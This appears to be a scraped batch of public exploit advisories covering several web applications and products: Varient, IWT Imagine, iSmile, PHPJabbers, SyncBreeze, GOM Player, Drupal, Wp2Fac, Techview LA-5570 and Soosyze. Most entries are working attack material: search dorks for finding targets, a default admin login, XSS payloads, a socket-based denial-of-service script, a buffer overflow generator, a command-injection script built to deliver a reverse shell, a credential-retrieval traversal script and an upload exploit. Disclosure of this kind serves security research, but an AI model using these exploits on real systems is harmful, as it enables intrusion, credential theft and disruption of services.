<pre><code>======================================================================================================================================<br />| # Title : Varient News Magazine Script V1.3.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://varient.codingest.com/ | <br />| # Dork : "Varient - News Magazine - Varient" |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] Use Admin : admin@gmail.com & Pass : 1234<br /><br />[+] http://127.0.0.1/wwwmafrxyz/admin<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : IWT Imagineِ CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://imaginewebtech.com | <br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /photo-gallery.html?id=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] https://127.0.0.1wwsanklechain/photo-gallery.html?id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : iSmile Soft CMS v0.3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://jamalcom.com |<br />| # Dork : JamalCom هذا السكربت مبرمج بواسطة |<br />====================================================================================================================================<br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /themes/index.php/1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />[+] http://127.0.0.1/iSmile/themes/index.php/1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Add Admin : <br /><br />http://127.0.0.1/iSmile/install.php?etape=3<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Event Ticketing System-1.0 XSS-Reflected - RCE<br />## Author: nu11secur1ty<br />## Date: 09/08/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the `id` request parameter is copied into the value of an<br />HTML tag attribute which is encapsulated in double quotation marks.<br />The payload }}uypja"><script>alert(1)</script>k36c0 was submitted in<br />the id parameter. This input was echoed as<br />uypja"><script>alert(1)</script>k36c0 in the application's response.<br />The attacker can use this vulnerability to trick the user into<br />executing - opening the browser on his machine and opening a hazardous<br />URL address.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Testing Payload:<br />```GET<br />GET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplm<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7<br />Origin: http://demo.phpjabbers.com<br />Referer: http://demo.phpjabbers.com/<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br /><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)<br /><br />## Time spent:<br />01:25:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service<br /># Date: 30/08/2023<br /># Exploit Author: mohamed youssef<br /># Vendor Homepage: https://www.syncbreeze.com/<br /># Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe<br /># Version: 15.2.24<br /># Tested on: windows 10 64-bit<br />import socket<br />import time<br /><br /><br />pyload="username=admin&password="+'password='*500+""<br />request=""<br />request+="POST /login HTTP/1.1\r\n"<br />request+="Host: 192.168.217.135\r\n"<br />request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"<br />request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"<br />request+="Accept-Language: en-US,en;q=0.5\r\n"<br />request+="Accept-Encoding: gzip, deflate\r\n"<br />request+="Content-Type: application/x-www-form-urlencoded\r\n"<br />request+="Content-Length: "+str(len(pyload))+"\r\n"<br />request+="Origin: http://192.168.217.135\r\n"<br />request+="Connection: keep-alive\r\n"<br />request+="Referer: http://192.168.217.135/login\r\n"<br />request+="Upgrade-Insecure-Requests: 1\r\n"<br />request+="\r\n"<br />request+=pyload<br /><br />print (request)<br />s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br />s.connect(("192.168.217.135",80))<br />s.send(request.encode())<br />print (s.recv(1024))<br />s.close()<br />time.sleep(5)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 30.08.2023<br /># Vendor Homepage: https://www.gomlab.com<br /># Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE<br /># Tested Version: 2.3.90.5360 (latest)<br /># Tested on: Windows 11 64bit<br /># Thanks to: M. Akil GÜNDOĞAN<br /><br /># - Open GOM Player<br /># - Click on the gear icon above to open settings<br /># - From the menu that appears, select Audio<br /># - Click on Equalizer<br /># - Click on the plus sign to go to the "Add EQ preset" screen<br /># - Copy the contents of exploit.txt and paste it into the preset name box, then click OK<br /># - Crashed!<br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 260<br /><br />try:<br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC is not created")<br /> <br /><br /></code></pre>
<pre><code>## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction<br />## Author: nu11secur1ty<br />## Date: 08/30/2023<br />## Vendor: https://www.drupal.org/<br />## Software: https://www.drupal.org/download<br />## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http<br /><br />## Description:<br />It is possible to induce the application to perform server-side HTTP<br />requests to arbitrary domains.<br />The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was<br />submitted in the HTTP Host header.<br />The application performed an HTTP request to the specified domain. For<br />the second test, the attacker stored a response<br />on the server with malicious content. This can be bad for a lot of<br />users of this system if the attacker spreads a malicious URL<br />and sends it by email etc. By using a redirect exploit.<br /><br />STATUS: HIGH-Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /drupal/web/?psp4hw87ev=1 HTTP/1.1<br />Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com<br />Accept-Encoding: gzip, deflate, psp4hw87ev<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,<br />text/psp4hw87ev<br />Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111<br />Safari/537.36 psp4hw87ev<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Origin: https://psp4hw87ev.pwnedhost.com<br />```<br />[+]Response from Burpcollaborator server:<br />```HTTP<br />HTTP/1.1 200 OK<br />Server: Burp Collaborator https://burpcollaborator.net/<br />X-Collaborator-Version: 4<br />Content-Type: text/html<br />Content-Length: 62<br /><br /><html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html><br />```<br /><br />[+]Response from Attacker server<br />```HTTP<br />192.168.100.45 - - [30/Aug/2023 05:52:56] "GET<br />/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)<br /><br />## Time spend:<br />03:35:00<br /><br /></code></pre>
<pre><code># Exploit Title: Wp2Fac v1.0 - OS Command Injection<br /># Date: 2023-08-27<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://github.com/metinyesil/wp2fac<br /># Tested on: Kali Linux & Windows 11<br /># CVE: N/A<br /><br />import requests<br /><br />def send_post_request(host, revshell):<br /> url = f'http://{host}/send.php'<br /> headers = {<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)<br />Gecko/20100101 Firefox/102.0',<br /> 'Accept': '*/*',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'Origin': f'http://{host}',<br /> 'Connection': 'close',<br /> 'Referer': f'http://{host}/',<br /> }<br /><br /> data = {<br /> 'numara': f'1234567890 & {revshell} &;'<br /> }<br /><br /> response = requests.post(url, headers=headers, data=data)<br /> return response.text<br /><br />host = input("Target IP: ")<br /><br />revshell = input("Reverse Shell Command: ")<br /><br />print("Check your listener!")<br /><br />send_post_request(host, revshell)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities<br /># Google Dork: N/A<br /># Date: 25/08/2023<br /># Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]<br /># Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570<br /># Software Link: N/A<br /># Version: 1.0.19_T53<br /># Tested on: MACOS/Linux<br /># CVE : CVE-2023-34723<br /># POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725<br /><br />#!/opt/homebrew/bin/python3<br /><br />import requests<br />import sys<br />from time import sleep<br />from urllib3.exceptions import InsecureRequestWarning<br />from colorama import init<br />from colorama import Fore, Back, Style<br />import re<br />import os<br />import ipaddress<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />def banner():<br /> if os.name == 'posix':<br /> clr_cmd = ('clear')<br /> elif os.name == 'nt':<br /> clr_cmd = ('cls')<br /> os.system(clr_cmd)<br /> print ("[+]****************************************************[+]")<br /> print (" | Author : The Security Team |")<br /> print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")<br /> print (" | Description : TechVIEW LA-5570 Directory Traversal |")<br /> print (" | Usage : "+sys.argv[0]+" <target> |") <br /> print ("[+]****************************************************[+]")<br /><br />def usage():<br /> print (f"Usage: {sys.argv[0]} <target>")<br /><br />def main(target):<br /> domain = "http://"+target+"/config/system.conf"<br /> try:<br /> url = domain.strip()<br /> r = requests.get(url, verify=False, timeout=3)<br /> print ("[+] Retrieving credentials", flush=True, end='')<br /> sleep(1)<br /> print(" .", flush=True, end='')<br /> sleep(1)<br /> print(" .", flush=True, end='')<br /> sleep(1)<br /> print(" .", flush=True, end='')<br /> if ("system_password" in r.text):<br /> data = (r.text.split("\n"))<br /> print (f"\n{data[1]}")<br /> else:<br /> print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)<br /> except TimeoutError:<br /> print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)<br /> except KeyboardInterrupt:<br /> return<br /> except requests.exceptions.Timeout:<br /> print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)<br /> return<br /> <br />if __name__ == '__main__':<br /> if len(sys.argv)>1:<br /> banner()<br /> target = sys.argv[1]<br /> try:<br /> validate = ipaddress.ip_address(target)<br /> if (validate):<br /> main (target)<br /> except ValueError as e:<br /> print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) <br /> else:<br /> print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)<br /> <br /><br /></code></pre>
<pre><code>## Title: soosyze 2.0.0 - File Upload<br />## Author: nu11secur1ty<br />## Date: 04.26.2023-08.28.2023<br />## Vendor: https://soosyze.com/<br />## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />Broken file upload logic. The malicious user can upload whatever he<br />wants to an HTML file and when he tries to execute it he views almost<br />all<br />file paths. This could be worse than ever, it depends on the scenario.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```HTML<br /><!DOCTYPE html><br /><html><br /><head><br /><title>Hello broken file upload logic, now I can read your special<br />directory pats, thank you ;)</title><br /></head><br /><body><br /><h1><br /> <?php<br /> phpinfo();<br /> ?><br /> </h1><br /></body><br /></html><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)<br /><br />## Time spend:<br />01:27:00<br /><br /></code></pre>
